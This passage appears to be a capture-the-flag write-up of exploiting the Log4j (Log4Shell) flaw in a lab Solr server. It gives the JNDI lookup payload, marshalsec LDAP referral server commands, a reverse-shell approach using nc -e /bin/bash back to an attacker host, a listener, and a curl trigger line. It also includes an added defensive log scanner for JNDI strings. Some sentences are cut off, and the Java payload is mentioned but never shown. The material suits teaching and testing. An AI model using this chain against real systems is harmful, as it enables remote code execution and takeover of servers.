Exploitation

At this point, I have verified the target is in fact vulnerable by seeing this connection caught in my netcat listener. However, it made an LDAP request... so all my netcat listener may have seen was non-printable characters (strange-looking bytes). I can now build upon this foundation to respond with a real LDAP handler.

I will utilize an open-source, public utility to stage an "LDAP Referral Server". This will be used to essentially redirect the initial request of the victim to another location, where I can host a secondary payload that will ultimately run code on the target. This breaks down like so:

  1. ${jndi:ldap://attackerserver:1389/Resource} -> reaches out to our LDAP Referral Server

  2. LDAP Referral Server springboards the request to a secondary http://attackerserver/resource

  3. The victim retrieves and executes the code present in http://attackerserver/resource
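As an added example that is not part of the original write-up, here is a small Python scanner a defender could run over web-server access logs to pick out the JNDI lookup string from step 1 and break it into scheme, host, port and path, which is exactly the referral-server callback the three steps above rely on. The log lines and addresses are constructed samples.

```python
import re
from urllib.parse import urlparse

# Constructed sample access-log lines (not taken from the original room):
# one benign request, one carrying the JNDI lookup, one more benign line.
SAMPLE_LOG = """\
10.10.14.5 - - [10/Dec/2021:12:00:01 +0000] "GET /solr/admin/cores?wt=json HTTP/1.1" 200 512
10.10.14.5 - - [10/Dec/2021:12:00:02 +0000] "GET /solr/admin/cores?foo=${jndi:ldap://10.10.14.5:1389/Exploit} HTTP/1.1" 200 512
10.10.14.5 - - [10/Dec/2021:12:00:03 +0000] "GET /index.html HTTP/1.1" 200 1024
"""

# Matches a Log4j lookup of the form ${jndi:<scheme>://<host>[:<port>]/<path>}.
# The scheme is left open so ldap, ldaps, rmi and similar are all caught.
JNDI_RE = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<rest>[^}]*)\}", re.IGNORECASE)


def extract_jndi_lookups(line):
    """Return (scheme, host, port, path) for every JNDI lookup found in one log line."""
    hits = []
    for m in JNDI_RE.finditer(line):
        scheme = m.group("scheme").lower()
        # urlparse splits host:port/path for any scheme that uses the // authority form
        parsed = urlparse(f"{scheme}://{m.group('rest')}")
        hits.append((scheme, parsed.hostname, parsed.port, parsed.path))
    return hits


def scan_log(text):
    """Return [(line_number, lookups)] for each line that contains a JNDI lookup."""
    findings = []
    for n, line in enumerate(text.splitlines(), start=1):
        lookups = extract_jndi_lookups(line)
        if lookups:
            findings.append((n, lookups))
    return findings


if __name__ == "__main__":
    for n, lookups in scan_log(SAMPLE_LOG):
        for scheme, host, port, path in lookups:
            print(f"line {n}: {scheme} callback to {host}:{port} for {path}")
```

The scanner only recognises the plain `${jndi:...}` form shown on this page; URL-encoded or nested-lookup variants would need their own normalisation first.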

This means we will need an HTTP server, which I could simply host with any of the following options (serving on port 8000):

  • python3 -m http.server

  • php -S 0.0.0.0:8000

  • (or any other busybox httpd or formal web service you might like)

The first order of business, however, is obtaining the LDAP Referral Server. I will use the marshalsec utility offered at https://github.com/mbechler/marshalsec.

Ultimately, this needs to run Java. Reviewing the README for this utility, it suggests using Java 8. (You may or may not have success using a different version, but to "play by the rules,"

cd /root/Rooms/solar/marshalsec

We must build marshalsec with Maven, the Java build tool. If you do not yet have Maven on your system, you can install it through your package manager:

sudo apt install maven

Next, run the command to build the marshalsec utility:

mvn clean package -DskipTests

With the marshalsec utility built, I can start an LDAP referral server to direct connections to my secondary HTTP server:

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://YOUR.ATTACKER.IP.ADDRESS:8000/#Exploit"

Adjust the IP address for your attacking machine as needed. Note that we have supplied port 8000, the port our secondary HTTP server will be listening on.

Now that my LDAP server is ready and waiting, I can open a second terminal window to prepare my final payload and secondary HTTP server.

Ultimately, the log4j vulnerability will execute arbitrary code that you craft in the Java programming language. If you aren't familiar with Java, no problem: there is a simple syntax that "shells out" to run a system command. In fact, I will retrieve a reverse-shell connection so I can gain control over the target machine!

For this payload, I will execute a command on the target, specifically nc -e /bin/bash to call back to my attacker machine. This target has been configured with ncat for ease of exploitation, though I may consider experimenting with other payloads.

With the payload created and compiled, I can now host it by spinning up a temporary HTTP server:

python3 -m http.server

nc -lvnp 9999

curl 'http://10.10.157.119:8983/solr/admin/cores?foo=${jndi:ldap://YOUR.ATTACKER.IP.ADDRESS:1389/Exploit}'
